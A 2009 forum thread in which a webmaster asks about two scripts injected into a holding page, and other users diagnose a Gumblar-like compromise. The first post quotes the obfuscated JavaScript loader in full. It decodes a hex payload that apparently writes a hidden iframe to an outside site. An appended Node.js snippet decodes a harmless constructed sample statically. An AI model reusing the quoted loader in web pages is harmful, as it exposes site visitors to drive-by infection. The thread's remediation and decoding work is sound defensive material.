
Suspicious code in our html?!?

  • 16-07-2009 8:18am
    #1
    Closed Accounts Posts: 150 ✭✭


    Guys, I uploaded a holding page for a new site yesterday and this morning found the formatting a bit off... so I looked at the code and found 2 scripts which I hadn't put there!

    I have now removed it.

    Anyone know what it was trying to do? How it got there? Or what I should do to prevent a repeat?

    Here's what appeared:

    Just after <body>
    <script>c07dca4='';rd3b31cb9cd=document;rd3b31cb9cd.write('<scr'+'ipt>function rdf9534(r818206cd){return ev'+c07dca4+'al(r818206cd); }</scr'+'ipt>'); function c07442678cr715bc074(r298d5f2485){ function rbbdebe3(){return 16;} var dd70='';return (rdf9534('pars'+dd70+'eInt')(r298d5f2485,rbbdebe3()));}function r3d8170(rf0f623){ var r1e96b4=2; var rf52794f0ec='';r43425='fromCh';r4431d0a867=String[r43425+'arCode'];for(rc58967=0;rc58967<rf0f623.length;rc58967+=r1e96b4){ rf52794f0ec+=(r4431d0a867(c07442678cr715bc074(rf0f623.substr(rc58967,r1e96b4))));}return rf52794f0ec;} var rd54710f0='3C7363726970743E69662821'+c07dca4+'6D796961'+c07dca4+'297B646F63756D656E742E777269746528756E65736361'+c07dca4+'7065282027253363253639253636253732253631'+c07dca4+'253664253635253230253665253631'+c07dca4+'253664253635253364253633253330253337253230253733253732253633253364253237253638253734253734253730253361'+c07dca4+'253266253266253733253735253661'+c07dca4+'253635253734253663253639253665253635253265253732253735253266253733253633253635253665253635253732253639253633253265253638253734253664253663253366253237253262253464253631'+c07dca4+'253734253638253265253732253666253735253665253634253238253464253631'+c07dca4+'253734253638253265253732253631'+c07dca4+'253665253634253666253664253238253239253261'+c07dca4+'253332253336253338253333253333253332253239253262253237253635253636253336253336253634253636253333253336253237253230253737253639253634253734253638253364253337253330253338253230253638253635253639253637253638253734253364253333253337253339253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361'+c07dca4+'253638253639253634253634253635253665253237253365253363253266253639253636253732253631'+c07dca4+'2536642536352533652729293B7D7661'+c07dca4+'72206D796961'+c07dca4+'3D747275653B3C2F7363726970743E';rd3b31cb9cd.write(r3d8170(rd54710f0));</script>

    Just after </html>
    <script>check_content()</script>


Comments

  • Registered Users, Registered Users 2 Posts: 68,317 ✭✭✭✭seamus


    Is this using any kind of "free" hosting or somesuch? Providers of budget or free hosting in the past have altered customer sites to include ads and whatnot.


  • Registered Users, Registered Users 2 Posts: 2,934 ✭✭✭egan007


    Have you googled it....plenty of results

    <script>check_content()</script>


  • Closed Accounts Posts: 150 ✭✭515


    No. Paid hosting. No ad appeared... just blank space at the top of the page...


  • Registered Users, Registered Users 2 Posts: 1,176 ✭✭✭podgeen


    It looks similar to a Gumblar infection but does not appear to have the usual characteristics.

    Have you got an updated virus scan on the machine you used to upload the files? Have you seen this appear on any other pages/sites that you have access to?


  • Closed Accounts Posts: 150 ✭✭515


    Yes, I have updated virus protection.

    No, I haven't seen this on any other pages I have uploaded.


  • Closed Accounts Posts: 150 ✭✭515


    Has anyone any idea what that code would have done?


  • Closed Accounts Posts: 150 ✭✭515


    podgeen wrote: »
    It looks similar to a Gumblar infection but does not appear to have the usual characteristics.

    Have you got an updated virus scan on the machine you used to upload the files? Have you seen this appear on any other pages/sites that you have access to?

    Just spoke to our hosts and it looks like podgeen is spot on. Somehow it got past my antivirus... will do a scan now and try to find and remove it.

    Then it's recommended that (from a clean PC) I change my FTP passwords.

    Thanks all.


  • Registered Users, Registered Users 2 Posts: 9,579 ✭✭✭Webmonkey


    I had this, did you get it removed?
    I had a case where it created a htaccess file to redirect content via a proxy script that embedded the content. Very smart :)


  • Closed Accounts Posts: 150 ✭✭515


    Webmonkey wrote: »
    I had this, did you get it removed?
    I had a case where it created a htaccess file to redirect content via a proxy script that embedded the content. Very smart :)

    Well I removed those 2 bits of script... I haven't checked the htaccess file...


  • Registered Users, Registered Users 2 Posts: 9,579 ✭✭✭Webmonkey


    515 wrote: »
    Well I removed those 2 bits of script... I haven't checked the htaccess file...
    That's ok if you saw it in it. But when I downloaded the file and removed it and uploaded again, it appeared again. Then I noticed what was happening. That was only the case with one or two of my sites, the rest were just embedded manually.
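
On the question of what such a script does: the snippet in the first post hides its payload as a hex string broken up by joins of an empty variable, and its own decoder turns each hex pair into a character with `parseInt(..., 16)` and `String.fromCharCode`. The following is an added example, not part of the thread, that unpacks that kind of layering statically in Node.js without evaluating anything; the sample input, the names `buildSample`, `decodeLayers` and `findIframes`, and the `example.invalid` URL are constructed for illustration.

```javascript
// Static unpacking only: the sample is handled as text, never evaluated or fetched.

// CONSTRUCTED sample with the same layering as the injected script; the target
// is a harmless URL on the reserved .invalid TLD.
function buildSample() {
  const html = "<iframe src='http://example.invalid/x.html' width=1 height=1 " +
               "style='visibility:hidden'></iframe>";
  const pct = [...html].map(c => '%' + c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
  const script = "<script>document.write(unescape('" + pct + "'));</script>";
  const hex = Buffer.from(script, 'latin1').toString('hex').toUpperCase();
  // Break the hex literal with joins of an empty variable, as the real script does.
  return "junk='';var p='" + hex.slice(0, 40) + "'+junk+'" + hex.slice(40) + "';";
}

function decodeLayers(source) {
  // Layer 0: drop '+name+' joins for variables that are assigned the empty string.
  const empties = [...source.matchAll(/([A-Za-z_$][\w$]*)\s*=\s*''\s*;/g)].map(m => m[1]);
  let joined = source;
  for (const name of empties) joined = joined.split("'+" + name + "+'").join('');
  // Layer 1: the longest run of hex byte pairs is the encoded first stage.
  const runs = joined.match(/(?:[0-9A-Fa-f]{2}){16,}/g) || [];
  if (runs.length === 0) return null;
  const longest = runs.reduce((a, b) => (b.length > a.length ? b : a));
  const stage1 = Buffer.from(longest, 'hex').toString('latin1');
  // Layer 2: the %XX escapes that stage 1 hands to unescape().
  const stage2 = stage1.replace(/%([0-9A-Fa-f]{2})/g,
    (_, h) => String.fromCharCode(parseInt(h, 16)));
  return { stage1, stage2 };
}

// Report every iframe in the decoded markup and whether it is styled to be invisible.
function findIframes(html) {
  return [...html.matchAll(/<iframe\b[^>]*>/gi)].map(m => ({
    src: (m[0].match(/\bsrc\s*=\s*['"]?([^'"\s>]+)/i) || [])[1] || null,
    hidden: /visibility\s*:\s*hidden|display\s*:\s*none/i.test(m[0]),
  }));
}

const decoded = decodeLayers(buildSample());
console.log(decoded.stage1.slice(0, 60) + '...');
console.log(findIframes(decoded.stage2));
```

Run against a saved copy of an infected page, the same two functions list the frame sources to report to the host, which helps when checking other files for the same injection.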

